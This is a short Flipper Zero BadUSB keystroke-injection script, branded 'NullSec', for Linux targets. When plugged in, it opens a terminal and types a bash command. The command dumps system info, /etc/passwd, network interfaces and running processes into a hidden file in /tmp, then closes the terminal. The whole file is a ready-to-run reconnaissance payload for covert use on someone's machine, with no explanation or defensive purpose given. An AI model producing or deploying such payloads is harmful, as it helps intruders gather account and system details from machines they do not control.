REM ========================================
REM NullSec Flipper Zero BadUSB
REM Payload: Linux System Recon
REM Target: Linux
REM ========================================
DELAY 1000
CTRL ALT t
DELAY 1000
STRING bash -c 'echo "=== SYSTEM INFO ===" > /tmp/.recon.txt; uname -a >> /tmp/.recon.txt; echo "=== USERS ===" >> /tmp/.recon.txt; cat /etc/passwd >> /tmp/.recon.txt; echo "=== NETWORK ===" >> /tmp/.recon.txt; ip a >> /tmp/.recon.txt; echo "=== PROCESSES ===" >> /tmp/.recon.txt; ps aux >> /tmp/.recon.txt' && exit
ENTER
